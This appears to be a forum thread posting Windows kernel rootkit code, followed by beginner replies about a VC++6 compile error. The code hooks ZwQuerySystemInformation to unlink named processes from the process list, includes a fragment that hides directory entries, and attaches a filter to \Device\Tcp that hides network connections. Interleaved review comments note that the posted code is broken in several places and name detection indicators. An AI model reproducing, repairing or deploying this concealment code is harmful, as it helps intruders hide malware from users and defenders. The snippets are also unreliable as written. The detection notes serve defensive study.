// Shift the remaining records down over this one (overlapping copy).
int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer;
int iLeft = (DWORD)FileInformationBufferLength - iPos - p->dwLenToNext;
RtlCopyMemory( (PVOID)p, (PVOID)( (char *)p + p->dwLenToNext ), (DWORD)iLeft );
continue; // re-examine the record now at p
}
}
pLast = p;
p = (PDirEntry)((char *)p + p->dwLenToNext );
}while( !bLastOne );
// NOTE(review): frees only the last pair; earlier iterations leak.
RtlFreeAnsiString(&ansiDirName);
RtlFreeAnsiString(&ansiFileName);
}
return(rc);
}



// 隐藏进程



// Replacement for ZwQuerySystemInformation. Forwards to the original
// (OldZwQuerySystemInformation, not shown) and, for class 5
// (SystemProcessInformation), splices out of the returned record chain every
// process whose name matches a PTR_HIDEPROC entry in list_head.
//
// Review notes (the snippet as posted cannot work as intended):
//  - process_name is declared but never assigned -- nothing copies
//    curr->ProcessName into it -- so the Length check and the memcmp below
//    operate on an uninitialized ANSI_STRING.
//  - When the record to hide is the first one (prev == NULL) the code
//    advances SystemInformation, but that is the by-value parameter, so the
//    caller's buffer is unchanged; only non-first records are really skipped.
//  - `(char *)curr += ...` and `(char *)SystemInformation += ...` cast an
//    lvalue; that is a compiler extension, not standard C.
//  - g_hide_proc is a local that is always TRUE.
//  - ReturnLength is left as the original reported it.
// Detection note: as with the directory hook, the hooked service-table entry
// is the direct indicator; a process visible via other kernel structures but
// absent from SystemProcessInformation is the cross-view signal.
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS rc;



ANSI_STRING process_name,process_uname,process_name1,process_name2;
BOOL g_hide_proc = TRUE;
CHAR aProcessName[80];
PP_DIR ptr;
int found;




// Call the original ZwQuerySystemInformation first.



rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength );



if(NT_SUCCESS(rc ))
{
if( g_hide_proc && (5 == SystemInformationClass))
{
// View the result buffer as a chain of _SYSTEM_PROCESSES records.
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;



// Walk the process records.
while(curr)
{

// NOTE(review): process_name was never initialized (see header note).
if((0 < process_name.Length) && (255 > process_name.Length))
{
found=0;
// Walk the hide list.
for (ptr=list_head;ptr!=NULL;ptr=ptr->next )
{
if (ptr->flag != PTR_HIDEPROC) continue ;

if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
{
found =1;
}
}

// Matching name: unlink this record (and any consecutive matches).
while(found)
{



if(prev)
{
// Make the previous record point past the current one.
if(curr->NextEntryDelta)
{
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
prev->NextEntryDelta = 0;
}
}
else
{
// NOTE(review): only the local parameter moves; the caller still
// sees the first record.
if(curr->NextEntryDelta)
{
(char *)SystemInformation += curr->NextEntryDelta;
}
else
{
SystemInformation = NULL;
}
}

if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else
{
curr = NULL;break;
}
// Re-check the (unchanged) name against the hide list.
found = 0;
for (ptr=list_head;ptr!=NULL;ptr=ptr->next )
{
if (ptr->flag != PTR_HIDEPROC) continue ;

if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
{
found = 1;
}
}
}
}
if(curr != NULL)
{
prev = curr;
if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}
}
}
}
return(rc);
}




//隐藏端口



// Port-hiding setup. Everything from the `Empty = ...` line down is a fragment
// of a function body (it uses DriverObject, FileObject and i, which are not
// declared here, and returns a status), presumably lifted from DriverEntry.
// It creates a filter device, attaches it on top of \Device\Tcp and routes
// the driver's dispatch entries to PassThrough().
//
// Review notes:
//  - `PDEVICE_OBJECT FilterDevice` is missing its semicolon.
//  - TcpDriver is declared but never assigned, yet it is dereferenced in the
//    dispatch loop.
//  - `DriverObject->MajorFunction` is compared and assigned without an index
//    in the loop; the `[i]` subscript was most likely swallowed by forum
//    markup (BBCode italics), so the posted loop does not compile as is.
//  - A failed IoAttachDeviceToDeviceStack returns STATUS_SUCCESS.
// Detection note: an unexpected device attached to the \Device\Tcp stack
// (visible when walking the device stack) is the indicator for this filter.

// Lower device the filter forwards IRPs to (set after attaching).
PDEVICE_OBJECT m_TcpgetDevice;



PDEVICE_OBJECT TcpDevice;
UNICODE_STRING TcpDeviceName;
PDRIVER_OBJECT TcpDriver;
PDEVICE_OBJECT TcpgetDevice;
PDEVICE_OBJECT FilterDevice
PDRIVER_DISPATCH Empty;
NTSTATUS status;



// The driver's own IRP_MJ_CREATE handler is used as the "not overridden" marker.
Empty = DriverObject->MajorFunction[IRP_MJ_CREATE];

RtlInitUnicodeString( &TcpDeviceName, L"\\Device\\Tcp");



// Look up the existing TCP device object.



status = IoGetDeviceObjectPointer( &TcpDeviceName,
FILE_ALL_ACCESS,
&FileObject,
&TcpDevice
);




if(!NT_SUCCESS(status))
{
DbgPrint("IoGetDeviceObjectPointer error!\n");
return status;
}



DbgPrint("IoGetDeviceObjectPointer ok!\n");

// Create the (unnamed) filter device.
status = IoCreateDevice( DriverObject,
sizeof(DEVICE_EXTENSION),
NULL,
FILE_DEVICE_UNKNOWN,
0,
FALSE,
&FilterDevice
);
if(!NT_SUCCESS(status))
{
return status;
}



// Attach it on top of the TCP device stack.



TcpgetDevice = IoAttachDeviceToDeviceStack( FilterDevice, TcpDevice);



if(!TcpgetDevice)
{
IoDeleteDevice(FilterDevice);
DbgPrint("IoAttachDeviceToDeviceStack error!\n");
return STATUS_SUCCESS;
}



m_TcpgetDevice = TcpgetDevice;

// Route dispatch entries to the pass-through handler.
// NOTE(review): missing [i] index and TcpDriver is never initialized.
for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)
{
if((TcpDriver->MajorFunction!=Empty)&&(DriverObject->MajorFunction==Empty))
{
DriverObject->MajorFunction = PassThrough;

}
}



// Drop the file-object reference taken by IoGetDeviceObjectPointer.
ObDereferenceObject(FileObject);




// Dispatch routine for the filter device attached to \Device\Tcp. Any IRP
// whose DeviceIoControl code equals QUERY_INFORMATION_EX (not defined on this
// page; presumably the TDI extended-query code) is completed immediately with
// STATUS_SUCCESS and without filling IoStatus.Information, so the caller sees
// an empty result -- this hides every endpoint, not a selected port (the
// comment at the check notes where a per-port filter would go). All other
// IRPs are forwarded to the lower device with a completion routine
// (GenericCompletion, not shown) attached.
//
// Review notes:
//  - Parameters.DeviceIoControl is read for every IRP without first checking
//    that the major function is IRP_MJ_DEVICE_CONTROL; the union member is
//    meaningless for other IRP types.
//  - The closing brace of the function is missing in the posted snippet.
NTSTATUS PassThrough( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{



NTSTATUS status;
PIO_STACK_LOCATION pIrpStack;



pIrpStack = IoGetCurrentIrpStackLocation( Irp );




// Query request: complete it here, empty.
if ( pIrpStack->Parameters.DeviceIoControl.IoControlCode == QUERY_INFORMATION_EX)
{
// A per-port check could be made here; as posted, everything is dropped.



Irp->IoStatus.Status=STATUS_SUCCESS;
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}



// Copy the current stack location for the lower driver.
IoCopyCurrentIrpStackLocationToNext(Irp);

IoSetCompletionRoutine( Irp,
GenericCompletion,
NULL,
TRUE,
TRUE,
TRUE
);



// Forward to the real TCP device.
return IoCallDriver( m_TcpgetDevice, Irp);


// 遍历进程
while(curr)
{

if((0 < process_name.Length) && (255 > process_name.Length))
{
found=0;


是这段吧?  你的注释写得让我这种新手感觉比较无奈~


--------------------Configuration: console - Win32 Debug--------------------
Compiling...
console.cpp
e:\me\vc6\console\console.cpp(1) : fatal error C1083: Cannot open include file: 'stdafx.h': No such file or directory
Error executing cl.exe.

console.exe - 1 error(s), 0 warning(s)


在VC++6.0下运行
出现这样的错误是因为什么啊?
那位大哥帮帮忙解决一下啊


#include<windows.h>
应该改成#include“stdafx.h”
我无所谓

